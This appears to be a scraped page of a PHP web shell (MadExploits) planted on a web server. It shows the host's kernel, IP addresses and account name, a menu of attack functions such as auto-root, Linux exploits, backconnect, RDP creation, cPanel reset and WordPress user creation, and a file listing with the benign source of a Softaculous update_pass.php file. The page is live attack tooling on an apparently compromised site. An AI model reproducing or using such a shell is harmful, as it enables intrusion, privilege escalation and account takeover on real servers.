Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.137.177.116
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
cpg /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
_update.php
32.32
KB
-rw-r--r--
changelog.txt
19.29
KB
-rw-r--r--
clone.php
5.06
KB
-rw-r--r--
config.inc.php
462
B
-rw-r--r--
edit.php
5.93
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
1.83
KB
-rw-r--r--
fileindex.php
1001
B
-rw-r--r--
import.php
3.17
KB
-rw-r--r--
info.xml
4.33
KB
-rw-r--r--
install.js
1.07
KB
-rw-r--r--
install.php
5.31
KB
-rw-r--r--
install.xml
1.06
KB
-rw-r--r--
md5
4.84
KB
-rw-r--r--
notes.txt
430
B
-rw-r--r--
update.php
32.33
KB
-rw-r--r--
update_pass.php
2.04
KB
-rw-r--r--
upgrade.php
4.3
KB
-rw-r--r--
upgrade.xml
625
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update_pass.php
<?php @unlink('update_pass.php'); function __pbkdf2($algorithm, $password, $salt, $count, $key_length, $raw_output = false){ if (function_exists("hash_pbkdf2")) { // The output length is in NIBBLES (4-bits) if $raw_output is false! if (!$raw_output) { $key_length = $key_length * 2; } return hash_pbkdf2($algorithm, $password, $salt, $count, $key_length, $raw_output); } $hash_length = strlen(hash($algorithm, "", true)); $block_count = ceil($key_length / $hash_length); $output = ""; for($i = 1; $i <= $block_count; $i++) { // $i encoded as 4 bytes, big endian. $last = $salt . pack("N", $i); // first iteration $last = $xorsum = hash_hmac($algorithm, $last, $password, true); // perform the other $count - 1 iterations for ($j = 1; $j < $count; $j++) { $xorsum ^= ($last = hash_hmac($algorithm, $last, $password, true)); } $output .= $xorsum; } if($raw_output) return substr($output, 0, $key_length); else return bin2hex(substr($output, 0, $key_length)); } $thumb_method = ''; if (function_exists("imagecreate") && function_exists("imagejpeg")) { $thumb_method = 'gd2'; $im = imagecreate(1, 1); $tst_image = "[[softpath]]/albums/userpics/gd1.jpg"; imagejpeg($im, $tst_image); $size = @getimagesize($tst_image); unlink($tst_image); $gd1_installed = ($size[2] == 2); $im = imagecreatetruecolor(1, 1); $tst_image = "[[softpath]]/albums/userpics/gd2.jpg"; imagejpeg($im, $tst_image); $size = @getimagesize($tst_image); unlink($tst_image); $gd2_installed = ($size[2] == 2); if(!$gd2_installed && $gd1_installed){ $thumb_method = 'gd1'; } } if (function_exists('random_bytes')) { $vect = random_bytes(24); } else { $vect = mcrypt_create_iv(24, MCRYPT_DEV_URANDOM); } $salt = base64_encode($vect); $resp = base64_encode(__pbkdf2("sha256", '[[admin_pass]]', $salt, 1000, 24, true)); echo $salt.'SOFTACULOUS'.$resp.'SOFTACULOUS'.$thumb_method; ?>
Close